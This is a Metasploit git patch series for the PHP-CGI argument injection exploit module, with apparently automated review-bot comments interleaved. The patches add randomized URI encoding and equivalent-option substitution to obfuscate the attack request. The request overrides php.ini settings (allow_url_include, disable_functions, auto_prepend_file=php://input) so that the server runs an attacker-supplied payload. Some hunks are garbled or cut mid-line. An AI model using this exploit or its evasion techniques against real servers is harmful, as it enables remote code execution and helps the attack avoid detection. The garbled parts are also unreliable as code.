From 4909d8073a0ec576a303f3072efcb1e28213cc66 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Wed, 9 May 2012 11:01:15 -0500 Subject: [PATCH 1/6] Added lots or encoding randomness --- .../multi/http/php_cgi_arg_injection.rb | 43 +++++++++++++++---- 1 file changed, 35 insertions(+), 8 deletions(-) diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 8794c4bc56..4f4da7a91b 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - response = send_request_raw({ 'uri' => uri + '?-s'}) + response = send_request_raw({ 'uri' => uri + "?#{create_arg("s")}"}) if response and response.code == 200 and response.body =~ /\\ Date: Wed, 9 May 2012 14:13:21 -0500 Subject: [PATCH 2/6] Lots of encoding randomizations for php_cgi_arg_injection --- .../multi/http/php_cgi_arg_injection.rb | 49 ++++++++++++++----- 1 file changed, 36 insertions(+), 13 deletions(-) diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 4f4da7a91b..31037b4c0c 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -53,6 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options([ OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]), + OptInt.new('URIENCODING', [true, "Level of URI URIENCODING and padding (0 for minimum)",5]), ], self.class) end 
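Review bot: The option description added for URIENCODING reads "Level of URI URIENCODING and padding", repeating the option name where the word "encoding" belongs; suggest `OptInt.new('URIENCODING', [true, "Level of URI encoding and padding (0 for minimum)",5]),`. The same line is carried forward, still misspelled, in the first hunk of patch 6 where only the default changes, so the wording fix applies there too. A short comment above the option saying what the integer bounds (it appears to be used by the later helpers both as the number of padding separators and as the cap on percent-encoded characters per value) would help users choose a level.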
@@ -85,19 +86,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit begin args = [ - rand_spaces(rand(50)), - create_arg("d","allow_url_include%3d#{rand_php_ini_true}"), - create_arg("d","safe_mode%3d#{rand_php_ini_false}"), - create_arg("d","suhosin.simulation%3d#{rand_php_ini_true}"), - create_arg("d","disable_functions%3d%22%22"), - create_arg("d","open_basedir%3dnone"), - create_arg("d","auto_prepend_file%3dphp://input"), + rand_spaces(datastore["URIENCODING"]), + create_arg("d","allow_url_include=#{rand_php_ini_true}"), + create_arg("d","safe_mode=#{rand_php_ini_false}"), + create_arg("d","suhosin.simulation=#{rand_php_ini_true}"), + create_arg("d",'disable_functions=""'), + create_arg("d","open_basedir=none"), + create_arg("d","auto_prepend_file=php://input"), create_arg("n") ] - qs = args.join("+") + qs = args.join() uri = "#{target_uri}?#{qs}" - + # Has to be all on one line, so gsub out the comments and the newlines payload_oneline = " 0 + chars << 0 + end + else + if max > 0 + max.times { chars << rand(string.length)} + end + end + chars.uniq.sort.reverse.each{|index| string[index] = "%"+"%02x" % string[index]} + string end def rand_spaces(x) @@ -141,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote end def rand_dash - ["-","%2d"][rand(2)] + ["-","%2d","%2D"][rand(3)] end def rand_php_ini_false From c2c160f86cf1db1243cfed32dad9fd917439c810 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Fri, 11 May 2012 11:31:26 -0500 Subject: [PATCH 3/6] randomizes options from equivilants --- .../multi/http/php_cgi_arg_injection.rb | 66 ++++++++++++++----- 1 file changed, 48 insertions(+), 18 deletions(-) diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 31037b4c0c..f8be97dcb8 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb 
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - response = send_request_raw({ 'uri' => uri + "?#{create_arg("s")}"}) + response = send_request_raw({ 'uri' => uri + "?#{create_arg("-s")}"}) if response and response.code == 200 and response.body =~ /\\ [ + "#{rand_dash}#{rand_encode("d")}", + "#{rand_dash}#{rand_dash}#{rand_encode("define")}" + ], + "-s" => [ + "#{rand_dash}#{rand_encode("s")}", + "#{rand_dash}#{rand_dash}#{rand_encode("syntax-highlight")}", + "#{rand_dash}#{rand_dash}#{rand_encode("syntax-highlighting")}" + ], + "-T" => [ + "#{rand_dash}#{rand_encode("T")}", + "#{rand_dash}#{rand_dash}#{rand_encode("timing")}" + ], + "-n" => [ + "#{rand_dash}#{rand_encode("n")}", + "#{rand_dash}#{rand_dash}#{rand_encode("no-php-ini")}" + ] + } + + equivs = opt_equivs[opt] + equivs ? equivs[rand(opt_equivs[opt].length)] : opt + + end + def rand_encode(string, max = string.length) + # Randomly URI encode characters from string, up to max times. chars = []; + if max > datastore["URIENCODING"] then max = datastore["URIENCODING"] end if string.length == 1 if rand(2) > 0 chars << 0 @@ -151,20 +181,20 @@ class Metasploit3 < Msf::Exploit::Remote string end - def rand_spaces(x) + def rand_spaces(num = datastore["URIENCODING"]) ret = '' - x.times { + num.times { ret << rand_space } ret end def rand_space - ["%20","%09","+"][rand(3)] + datastore["URIENCODING"] > 0 ? ["%20","%09","+"][rand(3)] : "+" end def rand_dash - ["-","%2d","%2D"][rand(3)] + datastore["URIENCODING"] > 0 ? ["-","%2d","%2D"][rand(3)] : "-" end def rand_php_ini_false From 12a28bd519869922e0af7677791ce90346b372ca Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Tue, 12 Jun 2012 14:59:06 -0500 Subject: [PATCH 4/6] Fixed ruby 1.9 String Indexing issue, using Rex::Text.uri_encode --- modules/exploits/multi/http/php_cgi_arg_injection.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) 
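Review bot: `rand_space` and `rand_dash` each repeat the `datastore["URIENCODING"] > 0` test inline, and `rand_spaces` reads the same option for its default, so the three helpers can drift apart if the option's meaning changes again; a small predicate such as `def uri_encoding?; datastore["URIENCODING"] > 0; end` used by both ternaries keeps them agreeing. None of the three helpers carries a comment; a one-liner on `rand_spaces` like `# Returns num random whitespace separators (default: the URIENCODING level)` and a note on `rand_space`/`rand_dash` that level 0 forces the plain `+` and `-` forms would document the contract the option description only hints at.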
diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb
index f8be97dcb8..d0d1ce0803 100644
--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -29,7 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
 a system-defined manner" from the RFC) and then passes them to the CGI binary." },
- 'Author' => [ 'egypt', 'hdm' ],
+ 'Author' => [ 'egypt', 'hdm', #original msf exploit
+ 'jjarmoc' ], #added URI encoding obfuscation
 'License' => MSF_LICENSE,
 'Version' => '$Revision$',
 'References' => [
@@ -177,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote
 max.times { chars << rand(string.length)}
 end
 end
- chars.uniq.sort.reverse.each{|index| string[index] = "%"+"%02x" % string[index]}
+ chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], "hex-all")}
 string
 end
From bbfe0f8f495f379cd5f797a47857177237cc82e6 Mon Sep 17 00:00:00 2001
From: Jeff Jarmoc
Date: Tue, 12 Jun 2012 20:00:28 -0500
Subject: [PATCH 5/6] " is 0x22, duh.
---
 modules/exploits/multi/http/php_cgi_arg_injection.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb
index d0d1ce0803..be36127b9e 100644
--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
 if val
 val = rand_encode(val)
 val.gsub!('=','%3d') # = must always be encoded
- val.gsub!('"','%2f') # " too
+ val.gsub!('"','%22') # " too
 end
 ret = ''
From a631e1fef1a525ad8cddab43b225bf97de896620 Mon Sep 17 00:00:00 2001
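Review bot: The rewritten line walks the chosen indexes from highest to lowest with no comment saying why; because each replacement turns one character into a three-character `%XX` sequence, ascending order would shift every later index, so add `# Replace from the highest index down so earlier indexes stay valid after each 1-to-3 character expansion` above it. It is also worth stating in the method's header comment that `rand_encode` mutates `string` in place and then returns it: patch 5's hunk shows `create_arg` assigning the return value (`val = rand_encode(val)`) and calling `gsub!` on it, so callers must not pass a string they still need unmodified. The body of rand_encode begins before this hunk.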
From: sinn3r
Date: Wed, 13 Jun 2012 00:43:59 -0500
Subject: [PATCH 6/6] Change the default state to make it work on Metasploitable by default
---
 .../multi/http/php_cgi_arg_injection.rb | 25 ++++++++++---------
 1 file changed, 13 insertions(+), 12 deletions(-)
diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb
index be36127b9e..0e61c04583 100644
--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
 register_options([
 OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]),
- OptInt.new('URIENCODING', [true, "Level of URI URIENCODING and padding (0 for minimum)",5]),
+ OptInt.new('URIENCODING', [true, "Level of URI URIENCODING and padding (0 for minimum)",0]),
 ], self.class)
 end
@@ -121,14 +121,14 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 end
-
+
 def create_arg(arg, val = nil)
 if val
- val = rand_encode(val)
+ val = rand_encode(val)
 val.gsub!('=','%3d') # = must always be encoded
 val.gsub!('"','%22') # " too
 end
-
+
 ret = ''
 ret << "#{rand_spaces}"
 ret << "#{rand_opt_equiv(arg)}"
@@ -137,9 +137,10 @@ class Metasploit3 < Msf::Exploit::Remote
 ret << "#{val}"
 ret << "#{rand_space}"
 end
-
+
 def rand_opt_equiv(opt)
- # Returns a random equivilant option from mapping at http://www.php.net/manual/en/features.commandline.options.php
+ # Returns a random equivilant option from mapping at
+ # http://www.php.net/manual/en/features.commandline.options.php
 opt_equivs = {
 "-d" => [
 "#{rand_dash}#{rand_encode("d")}",
@@ -159,12 +160,12 @@ class Metasploit3 < Msf::Exploit::Remote
 "#{rand_dash}#{rand_dash}#{rand_encode("no-php-ini")}"
 ]
 }
-
+
 equivs = opt_equivs[opt]
 equivs ? equivs[rand(opt_equivs[opt].length)] : opt
-
+
 end
-
+
 def rand_encode(string, max = string.length)
 # Randomly URI encode characters from string, up to max times.
 chars = [];
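Review bot: With the default lowered to 0, the "(0 for minimum)" wording promises more than the helpers deliver: as far as the partly garbled patch 3 hunk shows, `rand_encode`'s `string.length == 1` branch pushes index 0 on a coin flip without consulting `max`, so the single-letter option names built in `rand_opt_equiv` can still be percent-encoded at level 0, whereas `rand_spaces`, `rand_space` and `rand_dash` do honour 0. If 0 is meant to be the fully plain form, the single-character branch needs the same `max > 0` guard as the multi-character branch; otherwise the description should say what level 0 does and does not turn off.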
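Review bot: The re-wrapped comment added on the new side keeps the misspelling "equivilant"; since the line is being rewritten anyway, make it `# Returns a random equivalent option from the mapping at`. `rand_opt_equiv` continues past the end of this hunk.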
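Review bot: The context line `equivs ? equivs[rand(opt_equivs[opt].length)] : opt` repeats the hash lookup that the line above already bound to `equivs`; `equivs ? equivs[rand(equivs.length)] : opt` reads the same and cannot drift from the bound value. This is a style point on the line the whitespace-only changes surround, not on the changes themselves. rand_opt_equiv begins before the hunk and rand_encode continues after it.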
@@ -181,15 +182,15 @@ class Metasploit3 < Msf::Exploit::Remote
 chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], "hex-all")}
 string
 end
-
+
 def rand_spaces(num = datastore["URIENCODING"])
 ret = ''
 num.times {
 ret << rand_space
 }
- ret
+ ret
 end
-
+
 def rand_space
 datastore["URIENCODING"] > 0 ? ["%20","%09","+"][rand(3)] : "+"
 end